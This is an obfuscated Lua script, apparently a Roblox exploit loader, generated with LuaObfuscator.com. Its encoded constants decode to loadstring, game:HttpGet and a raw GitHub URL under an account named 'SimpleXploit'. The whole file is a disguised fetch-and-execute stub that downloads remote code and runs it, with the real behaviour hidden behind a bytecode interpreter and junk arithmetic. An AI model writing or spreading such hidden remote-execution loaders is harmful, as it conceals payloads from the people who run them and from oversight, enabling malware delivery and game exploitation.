--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v83,v19);v19=nil;v91=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -(1065 -(68 + 997)))) then v85=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + (1334 -(226 + 1044))))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(4 -3)) ;end end else local v86=0 + 0 ;local v87;while true do if (v86==(0 + 0)) then v87=(879 -(282 + 595))^(v32-(1638 -(1523 + 114))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or (0 -0) ;end end end end local function v21() local v34=(215 -98) -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==((0 -0) + 0)) then v35=v1(v16,v18,v18);v18=v18 + (958 -(892 + 65)) ;v34=(352 -(87 + 263)) -1 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v41 * 16777216) + (v40 * (66488 -(802 + 150))) + (v39 * ((1249 -560) -433)) + v38 ;end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((1770 -(201 + 571)) -((2053 -(116 + 1022)) + 82))) then v45=1;v46=(v20(v44,1,56 -36 ) * (2^(19 + 13))) + v43 ;v42=2 -0 ;end if (v42==(1189 -((4450 -3381) + 70 + 48))) then v47=v20(v44,76 -55 ,31);v48=((v20(v44,72 -40 )==1) and  -(1 -(0 -0))) or ((860 -(814 + 45)) + 0) ;v42=(9 -5) -1 ;end if (v42==(3 + 0)) then if (v47==(791 -(368 + 423))) then if (v46==(0 -0)) then return v48 * 0 ;else local v100=18 -(10 + 8) ;while true do if (v100==(0 -0)) then v47=1;v45=442 -(416 + 26) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 + 0 + 0)) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end if (v42==(0 + 0 + 0)) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(885 -(261 + 624))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1081 -(1020 + 60)) );v18=v18 + v49 ;local v51={};for v65=1 -0 , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 1690 -(209 + 1481) ;end)();while true do if (v67~=(529 -(406 + 123))) then else if (v52== #"[") then local v97=(function() return 0;end)();while true do if ((0 -0)==v97) then v57=(function() return v23();end)();v58=(function() return {};end)();v97=(function() return 1770 -(1749 + 20) ;end)();end if (v97~=2) then else v52=(function() return 1 + 1 ;end)();break;end if (v97==(1637 -(1373 + 263))) then for v110= #"{",v57 do local v111=(function() return 1322 -(1249 + 73) ;end)();local v112=(function() return;end)();local v113=(function() return;end)();local v114=(function() return;end)();while true do if (v111==0) then local v153=(function() return 1000 -(451 + 549) ;end)();local v154=(function() return;end)();while true do if (v153~=(0 + 0)) then else v154=(function() return 0 -0 ;end)();while true do if (v154==1) then v111=(function() return 1146 -(466 + 679) ;end)();break;end if ((0 -0)~=v154) then else v112=(function() return 1384 -(746 + 638) ;end)();v113=(function() return nil;end)();v154=(function() return 1901 -(106 + 1794) ;end)();end end break;end end end if (v111==(1 + 0)) then v114=(function() return nil;end)();while true do if (v112~= #"<") then else if (v113== #">") then v114=(function() return v21()~=(0 + 0) ;end)();elseif (v113==(1 + 1)) then v114=(function() return v24();end)();elseif (v113== #"-19") then v114=(function() return v25();end)();end v58[v110]=(function() return v114;end)();break;end if (v112==(0 -0)) then local v170=(function() return 341 -(218 + 123) ;end)();local v171=(function() return;end)();while true do if (0==v170) then v171=(function() return 1581 -(1535 + 46) ;end)();while true do if (v171==(0 + 0)) then v113=(function() return v21();end)();v114=(function() return nil;end)();v171=(function() return 1 + 0 ;end)();end if ((115 -(4 + 110))~=v171) then else v112=(function() return  #"}";end)();break;end end break;end end end end break;end end end v56[ #"19("]=(function() return v21();end)();v97=(function() return 2;end)();end end end if (v52~=(584 -(57 + 527))) then else local v98=(function() return 0;end)();local v99=(function() return;end)();while true do if (v98==(560 -(306 + 254))) then v99=(function() return 0 + 0 ;end)();while true do if (v99~=(2 + 0)) then else v52=(function() return  #"{";end)();break;end if (v99==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v99=(function() return 1469 -(899 + 568) ;end)();end if ((0 + 0)~=v99) then else v53=(function() return {};end)();v54=(function() return {};end)();v99=(function() return 2 -1 ;end)();end end break;end end end v67=(function() return 3 -2 ;end)();end if (v67==(604 -(268 + 335))) then if (v52==(1 + 1)) then for v101= #"]",v23() do local v102=(function() return v21();end)();if (v20(v102, #",", #">")~=(290 -(60 + 230))) then else local v106=(function() return 572 -(426 + 146) ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if (v106==(0 + 0)) then local v149=(function() return 1456 -(282 + 1174) ;end)();local v150=(function() return;end)();while true do if ((811 -(569 + 242))~=v149) then else v150=(function() return 0 -0 ;end)();while true do if (v150==(0 + 0)) then local v174=(function() return 1024 -(706 + 318) ;end)();while true do if (v174~=(1257 -(1043 + 214))) then else v107=(function() return v20(v102,7 -5 , #"nil");end)();v108=(function() return v20(v102, #"0836",6);end)();v174=(function() return 1213 -(323 + 889) ;end)();end if ((1252 -(721 + 530))~=v174) then else v150=(function() return 1272 -(945 + 326) ;end)();break;end end end if (v150==(581 -(361 + 219))) then v106=(function() return 2 -1 ;end)();break;end end break;end end end if (v106~=(1 + 0)) then else local v151=(function() return 413 -(15 + 398) ;end)();while true do if (v151~=(701 -(271 + 429))) then else v106=(function() return 7 -5 ;end)();break;end if (v151~=0) then else v109=(function() return {v22(),v22(),nil,nil};end)();if (v107==(1500 -(1408 + 92))) then local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==(1086 -(461 + 625))) then v173=(function() return 0;end)();while true do if (v173==(0 + 0)) then v109[ #"-19"]=(function() return v22();end)();v109[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v107== #" ") then v109[ #"-19"]=(function() return v23();end)();elseif (v107==(1290 -(993 + 295))) then v109[ #"xxx"]=(function() return v23() -(2^(866 -(20 + 830))) ;end)();elseif (v107~= #"91(") then else local v179=(function() return 0 + 0 ;end)();local v180=(function() return;end)();while true do if (v179==(1171 -(418 + 753))) then v180=(function() return 0 + 0 ;end)();while true do if (v180~=(0 + 0)) then else v109[ #"-19"]=(function() return v23() -(2^16) ;end)();v109[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v151=(function() return 1;end)();end end end if (v106==(1 + 2)) then if (v20(v108, #"xnx", #"-19")~= #" ") then else v109[ #".com"]=(function() return v58[v109[ #"http"]];end)();end v53[v101]=(function() return v109;end)();break;end if (v106~=(740 -(542 + 196))) then else if (v20(v108, #"<", #" ")~= #"]") then else v109[2]=(function() return v58[v109[3 -1 ]];end)();end if (v20(v108,1 + 1 ,2)== #"}") then v109[ #"nil"]=(function() return v58[v109[ #"91("]];end)();end v106=(function() return 3;end)();end end end end for v103= #"<",v23() do v54[v103-#":" ]=(function() return v28();end)();end return v56;end break;end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 + 0 ];local v63=v59[2];local v64=v59[(478 -(41 + 435)) + 1 ];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=2 -1 ;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -((2553 -(938 + 63)) -(1126 + 425)) ;local v77={};local v78={};for v88=405 -(118 + 287) ,v76 do if ((2166<=4740) and (v88>=v70)) then v74[v88-v70 ]=v75[v88 + (3 -2) ];else v78[v88]=v75[v88 + (1122 -(91 + 27 + 1003)) ];end end local v79=(v76-v70) + (2 -1) ;local v80;local v81;while true do v80=v68[v72];v81=v80[378 -(142 + (1360 -(936 + 189))) ];if (v81<=(31 -24)) then if (v81<=3) then if (v81<=(1 + 0)) then if (v81==(977 -(553 + 424))) then do return;end else v78[v80[2]]=v80[5 -2 ]~=(0 + 0 + 0) ;end elseif ((1283<=4997) and (v81>2)) then local v116=0 + 0 ;local v117;while true do if (v116==(0 + 0)) then v117=v80[1 + 1 ];v78[v117]=v78[v117](v13(v78,v117 + (1614 -(1565 + 48)) ,v73));break;end end else local v118=v80[2 + 0 ];local v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[(4 + 2) -(1141 -(782 + 356)) ])));v73=(v120 + v118) -(2 -1) ;local v121=267 -(176 + 91) ;for v146=v118,v73 do v121=v121 + (2 -1) ;v78[v146]=v119[v121];end end elseif (v81<=(13 -8)) then if ((v81==(2 + 2)) or (3002<2579)) then v78[v80[2]]=v80[14 -(15 -4) ];else local v124=v80[1094 -(975 + 117) ];v78[v124]=v78[v124](v13(v78,v124 + ((2629 -(157 + 1718)) -(239 + 514)) ,v73));end elseif ((v81==(3 + 3 + 0)) or (678>4744)) then v78[v80[1331 -(797 + (1888 -1356)) ]]();else v78[v80[(6 -4) + 0 ]]();end elseif (v81<=(4 + (1025 -(697 + 321)))) then if (v81<=(20 -11)) then if (v81>8) then v78[v80[1204 -(373 + 829) ]]=v61[v80[734 -(476 + 255) ]];else v78[v80[2]]=v80[1133 -(369 + 761) ];end elseif ((4342>3456) and (v81>10)) then do return;end else local v130=(0 -0) + 0 ;local v131;local v132;local v133;local v134;while true do if (v130==(1 -0)) then v73=(v133 + v131) -(1 -0) ;v134=238 -(64 + 174) ;v130=2;end if ((v130==(1 + 1)) or (2368>2642)) then for v166=v131,v73 do v134=v134 + (1 -0) ;v78[v166]=v132[v134];end break;end if ((2105==2105) and (v130==(336 -(144 + (406 -214))))) then v131=v80[218 -(42 + 174) ];v132,v133=v71(v78[v131](v13(v78,v131 + 1 + 0 ,v80[3])));v130=1;end end end elseif (v81<=(11 + 2)) then if (v81==(6 + 6)) then local v135=0;local v136;local v137;while true do if (v135==(1505 -(363 + (2630 -1489)))) then v78[v136 + (1581 -(461 + 722 + 397)) ]=v137;v78[v136]=v137[v80[11 -7 ]];break;end if (v135==(0 + 0)) then v136=v80[(3 -1) + 0 ];v137=v78[v80[1978 -(1913 + 62) ]];v135=1 + 0 ;end end else v78[v80[(13 -8) -3 ]]=v80[1936 -(565 + 1368) ]~=(0 -0) ;end elseif ((4012>=2179) and (v81>(1675 -(1477 + 184)))) then local v139=v80[2 -0 ];local v140=v78[v80[(1230 -(322 + 905)) + 0 ]];v78[v139 + (857 -(564 + 292)) ]=v140;v78[v139]=v140[v80[6 -2 ]];else v78[v80[5 -(614 -(602 + 9)) ]]=v61[v80[307 -(244 + 60) ]];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403653Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53696D706C6558706C6F69742F53696D706C6553656170616E656C2D70726F746563742D2F726566732F68656164732F6D61696E2F50726F7465637450616E656C2Q5300093Q0012093Q00013Q001209000100023Q00200C000100010003001208000300044Q0001000400014Q000A000100044Q00035Q00022Q00073Q000100016Q00017Q00",v9(),...);
